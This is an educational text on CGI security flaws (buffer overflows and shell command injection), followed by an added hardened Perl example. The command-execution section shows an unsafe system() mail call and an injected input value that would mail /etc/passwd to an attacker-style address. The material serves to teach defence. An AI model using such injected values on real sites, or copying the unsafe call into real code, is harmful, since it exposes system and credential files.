CGI and WWW Services
As more websites offer interactive services, more CGI and web-based vulnerabilities are being uncovered. CGI vulnerabilities fall into three
categories:
• Buffer overflow.
• Command execution.
• Subverting client side scripting.
Buffer Overflow
Standard buffer overflow techniques can be applied to CGI scripts. Since scripts allow for user input, this input could be used to overflow
buffers in vulnerable programs. This only affects scripts written in
relatively low level languages such as C. Scripts should always perform
validation on all user input and internal functions should do sanity
checking on the size of buffers. Higher level, and more commonly used
scripting languages perform bounds checking on variable and array
lengths internally and will consequently not be vulnerable to buffer
overflow attack. Examples of such languages are:
• Java.
• Perl.
• Python.
Command Execution
Scripts written in higher level languages sometimes contain more insidious vulnerabilities than their low level cousins. A common
occurrence of this is command execution on the remote machine. This is
once again caused by poor input validation. For example, CGI scripts
sometimes contain code that executes shell commands such as the Perl
command:
system("mail $email < theTermsAndConditions.txt");
Which is a simple way of mailing a document to a user. In this example
the $email variable will contain an email address that was entered in a
form on the website. If no input validation is done when the user enters
her email address, it will be possible to embed shell commands into the
input field and have them executed by the system call.
hacker@hack.net < /etc/passwd;
Inserting the above value will cause the password file to be mailed to
the attacker. As with buffer overflow attacks, the level of privilege with
which these commands are executed depends on the privilege
level of the CGI script.
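A hardened form of the system() call above, as an added example that is not code from the original page. The names valid_email and send_terms are hypothetical, the sample addresses other than the page's own are constructed, and a mail binary on PATH is assumed.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Allow-list check: the first character must be alphanumeric (so the value can
# never look like a command-line option) and no whitespace or shell
# metacharacters are accepted anywhere. \z also rejects a trailing newline.
sub valid_email {
    my ($email) = @_;
    return 0 unless defined $email && length($email) <= 254;
    return $email =~ /\A[A-Za-z0-9][A-Za-z0-9._%+-]*\@[A-Za-z0-9][A-Za-z0-9.-]*\.[A-Za-z]{2,}\z/ ? 1 : 0;
}

# Replacement for: system("mail $email < theTermsAndConditions.txt");
sub send_terms {
    my ($email, $file) = @_;
    die "rejected address\n" unless valid_email($email);

    open(my $in, '<', $file) or die "cannot open $file: $!\n";
    # List-form pipe open execs mail directly; no shell ever parses $email,
    # so '<' and ';' would be plain argument bytes even if they got this far.
    open(my $mail, '|-', 'mail', $email) or die "cannot run mail: $!\n";
    print {$mail} $_ while <$in>;
    close($in);
    close($mail) or die "mail exited with status $?\n";
    return 1;
}

# Constructed sample inputs; the second is the value shown on this page.
my @samples = (
    'alice@example.com',
    'hacker@hack.net < /etc/passwd;',
    'bob@example.com other@example.com',
    '-f@example.com',
    "carol\@example.com\n",
);
for my $s (@samples) {
    (my $shown = $s) =~ s/\n/\\n/g;
    printf "%-36s %s\n", $shown, valid_email($s) ? 'accept' : 'reject';
}
```

Run as written, the script only classifies the sample inputs; send_terms is what the CGI handler would call with the submitted form value and the document path.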